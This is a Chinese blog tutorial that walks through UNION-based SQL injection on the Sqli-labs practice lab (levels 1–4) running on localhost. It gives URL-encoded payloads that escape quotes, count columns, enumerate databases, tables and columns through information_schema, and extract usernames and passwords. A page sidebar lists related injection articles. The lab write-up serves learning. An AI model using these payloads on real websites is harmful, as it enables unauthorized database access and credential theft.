Sql注入之联合查询

最新推荐文章于 2024-06-15 20:21:51 发布
最新推荐文章于 2024-06-15 20:21:51 发布
阅读量264 收藏 5
点赞数 9
分类专栏: MySql-injection 文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61802503/article/details/137685673
版权
  • 以Sqli-labs的Less1-4为例

尝试单引号括号逃逸

1.尝试在http://localhost/sqli-labs/Less-1/?id=1后添加单引号'

在这里插入图片描述
2.查看报错,尝试 or = 1 =1 --+之后,前端回显数据。
在这里插入图片描述3.利用order by 对数据排序,发现当列超过3时报错。

http://localhost/sqli-labs/Less-1/?id=1%27%20order%20by%204%20--+

在这里插入图片描述

4.尝试采用 union 联合注入,union的作用是将两个sql语句进行联合。union前后的两个sql语句的选择列数要相同才行。
在这里插入图片描述
5. 爆数据库

http://localhost/sqli-labs/Less-1/?id=-1%27%20union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata%20--+

在这里插入图片描述6. 爆security数据库的表

http://localhost/sqli-labs/Less-1/?id=-1%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+

在这里插入图片描述
7. 爆表users的列

http://localhost/sqli-labs/Less-1/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27--+%20LIMIT%200,1

在这里插入图片描述
8.爆数据

http://localhost/sqli-labs/Less-1/?id=-1%27%20union%20select%201,username,password%20from%20users%20where%20id=2--+%20limit%200,1

在这里插入图片描述

less1-4

  • 因为less1-4都是单引号或括号逃逸的,所以不再多做赘述,通过源码可以发现。

less1

http://localhost/sqli-labs/Less-1/?id=-1%27%20union%20select%201,username,password%20from%20users%20where%20id=2--+%20limit%200,1## less2
在这里插入图片描述

less2

http://localhost/sqli-labs/Less-2/?id=-1%20union%20select%201,username,password%20from%20users%20where%20id=4--+%20limit%200,1

在这里插入图片描述

less3

http://localhost/sqli-labs/Less-3/?id=-1%27)%20union%20select%201,username,password%20from%20users%20where%20id=6--+%20limit%200,1

在这里插入图片描述

less4

http://localhost/sqli-labs/Less-4/?id=-1%22)%20union%20select%201,username,password%20from%20users%20where%20id=6--+%20limit%200,1

在这里插入图片描述

CyberSecure
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入联合查询
m0_56578216的博客
08-22 872
适用数据库中的内容会回显到页面中来的情况。联合查询就是利用union select 语句,该语句会同时执行两条select 语句,实现跨库、跨表询。两条select 语句询结果具有相同列数:对应的列数据类型相同(特殊情况下,条件被放松)。联合查询就是利用SQL语句中的union select语句同时执行两条select语句,实现跨表询的方法。由于联合查询会将数据库中的两张表按照列数拼接(纵向拼接)后再进行询,所以要求两条select语句询的表必须******
(手工)【sqli-labs23】联合查询+报错回显
07-11 363
SQL-联合查询+报错回显】
sql注入联合查询
笔墨稠思
07-07 999
本次注入采用DVWA作为靶场,数据库采取mysql 首先我们设置一下dvwa的安全等级 修改等级后点击submit按钮,之后我们进入sql注入的实战靶场 联合查询注入,我们需要用到 union 来连接两条sql语句 一.判断注入类型 他给了我们一个form表单,让我们提交一个user ID进去,这个注入点很明确,肯定是我们输入进去的id了,id一般都是int 类型的,但也有可能是字符串类型的 那数据库询语句可能是 select * from 表 where id = $user_id 也可能是
sql注入联合查询注入
qq_50953689的博客
05-04 1503
判断数据显示点 (id一定要改为0或负数) id=0' union select 1,2,3 主要作用:测试数据库表中的有效column是哪几列
SQL注入联合查询注入
qq_45691294的博客
07-11 7055
MySQL中的联合查询 联合查询是可合并多个相似的选择询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的询组合在一起,使用为此为UNINO或UNION ALL 联合查询:将多个询的结果合并到一起(纵向合并):字段数不变,多个询的记录数合并 基本语法: select 语句 union[union选项] select 语句; 联合查询注入的条件 联合查询注入是MySQL注入中的一种方式,在SQL注入中说了注入漏洞存在的相关条件,而联合查询注入这种方法需要满足询的信息在前端有回显,回显数据
sql注入详解
热门推荐
good good study
05-05 19万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库询...
SQL注入联合查询、报错注入和sqlmap
Loners_fan的博客
01-03 4058
SQL注入
二、SQL注入联合查询
qq_55202378的博客
08-21 729
联合注入
SQL注入联合查询和报错注入
qq_45076423的博客
11-11 840
联合查询 联合查询就是利用SQL 语句union select 。 union select 会把两条SQL 语句的询结果拼接起来,形成一张虚拟的表。联合查询会实现跨库跨表询,会极大减少SQL 注入的成本。 联合查询有两个限制条件 两条SQL 语句的询结果具有相同的列数 两条SQL 语句相同位置的列具有相同的数据类型 联合查询通常用在数据库的内容会回显到网页上的情况,所以联合查询通...
sql注入之联合注入
m0_59576693的博客
09-19 608
sql联合注入和联合注入细节以及联合注入流程和联合注入payload
sql注入联合查询,最详细的CMS联合查询过程!!!!
08-22
CMS中sql注入联合查询,费心三小时制作!!!,超详细
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
SQL二次注入和截断联合使用
12-14
这次主要是说明sql的二次注入和sql插入数据库时...在下一次进行需要进行询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样会造成SQL的二次注入。比如在第一次插入数据的时候,数据中带有单
SqlMap-Sql注入
08-02
完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆询注入。 在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。 支持枚举用户、密码、哈希、...
SQL注入基础整理及Tricks总结1
08-03
1. 联合查询 2. 报错注 3. 布尔盲注 4. 时间盲注 3. 笛卡尔积
【AI+编程】工作日常场景随时可以AI编程,记一个问答SQL快速导出数据日常示例
最新发布
月晓风清
06-15 342
为了实现你需要的操作,即以问题名称作为表头,答案作为内容导出,你可以通过JOIN操作连接三个表,然后利用动态SQL语句进行行转列转换(PIVOT)。然后通过执行这个动态生成的SQL,你可以得到一个表格,表中的每一行表示一个成员,对应每个问题的答案作为列数据。然后,在动态生成的SQL语句中利用JOIN把db_member、db_question和db_answer连接起来,并根据question_id和member_id进行匹配,以输出每个成员对应的问题答案。下面是假定表结构,实际场景和它类似。
Python Flask 使用SQLAlchemy实现ORM管理
胖蔡叨叨叨
06-12 330
SQLAlchemy是python里提供的一款SQL工具,支持数据库连接、映射、对象关系映射(ORM)以及数据库操作等功能。SQLAlchemy在构建在WSGI规范上的下一代中得到了广泛应用。如下介绍如何在Flask项目中配合实现数据库管理。
PostgreSQL的视图pg_roles
lee_vincent1的博客
06-10 676
pg_roles是 PostgreSQL 中的一个系统视图,提供了关于数据库角色(用户和组)的信息。PostgreSQL 中的角色用于管理数据库的权限、登录能力以及其他安全相关的特性。通过询pg_roles视图,数据库管理员可以了解和管理数据库中所有角色的详细信息。pg_roles。
sql注入union联合查询
05-19
其中,union联合查询就是SQL注入中常用的一种方式。 在SQL语句中,union是用来连接两条或多条select语句的关键字,它可以将两个询结果合并成一个结果集。攻击者可以通过在输入框中输入一些特殊的字符或者语句,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CyberSecure

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值